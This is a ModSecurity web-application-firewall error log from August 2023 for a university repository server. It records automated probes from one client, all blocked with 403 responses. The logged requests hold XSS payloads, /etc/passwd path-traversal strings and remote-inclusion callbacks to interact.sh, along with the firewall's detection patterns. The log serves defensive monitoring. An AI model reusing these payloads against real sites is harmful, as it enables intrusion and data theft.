[Tue Aug 29 11:52:44.547325 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAoQ3MEAAAAN"]
[Tue Aug 29 11:52:45.572876 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAnHQnkAAAAT"]
[Tue Aug 29 11:52:46.723878 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoGFa4AAAAE"]
[Tue Aug 29 11:52:46.888777 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAoXJqgAAAAP"]
[Tue Aug 29 11:52:47.661367 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoVqo8AAAAH"]
[Tue Aug 29 11:52:48.527556 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15oMCo-f0AAAoLfK8AAAAG"]
[Tue Aug 29 11:52:48.540719 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAlUlw0AAAA0"]
[Tue Aug 29 11:52:49.551664 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoW7JEAAAAJ"]
[Tue Aug 29 11:52:49.619288 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAmQ-3gAAAAb"]
[Tue Aug 29 11:52:49.644206 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAoGFbwAAAAE"]
[Tue Aug 29 11:52:49.672602 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoW7JUAAAAJ"]
[Tue Aug 29 11:52:50.542934 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15osCo-f0AAAnTlV0AAAAA"]
[Tue Aug 29 11:52:52.037465 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAnd3NsAAAAI"]
[Tue Aug 29 11:52:52.549101 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAoLfMoAAAAG"]
[Tue Aug 29 11:52:52.621363 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoLfMsAAAAG"]
[Tue Aug 29 11:52:52.825743 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoW7KgAAAAJ"]
[Tue Aug 29 11:52:55.917415 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoQ3OYAAAAN"]
[Tue Aug 29 11:52:56.032147 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15qMCo-f0AAAofm3AAAAAX"]
[Tue Aug 29 11:52:56.038983 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAoesJYAAAAV"]
[Tue Aug 29 11:52:58.542051 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoAkvUAAAAC"]
[Tue Aug 29 11:52:59.205173 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoW7LwAAAAJ"]
[Tue Aug 29 11:53:00.668805 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoXJtEAAAAP"]
[Tue Aug 29 11:53:00.694313 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAhoHVgAAAAl"]
[Tue Aug 29 11:53:01.580465 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rcCo-f0AAAouCxkAAAAo"]
[Tue Aug 29 11:53:01.673166 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAoXJtUAAAAP"]
[Tue Aug 29 11:53:02.543829 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAor7oIAAAAk"]
[Tue Aug 29 11:53:02.682077 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAor7oMAAAAk"]
[Tue Aug 29 11:53:04.192627 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAofm4QAAAAX"]
[Tue Aug 29 11:53:04.782213 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoXJt4AAAAP"]
